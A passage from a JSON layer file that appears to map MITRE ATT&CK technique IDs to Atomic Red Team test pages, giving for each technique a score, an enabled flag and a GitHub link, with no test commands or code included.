Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}]},{"techniqueID":"T1127.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":9,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":77,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218.001","score":8,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":9,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1529","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1531","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.001","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":45,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.001","score":17,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":42,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":38,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":3,"enabled":true,"links":[{"label":"View 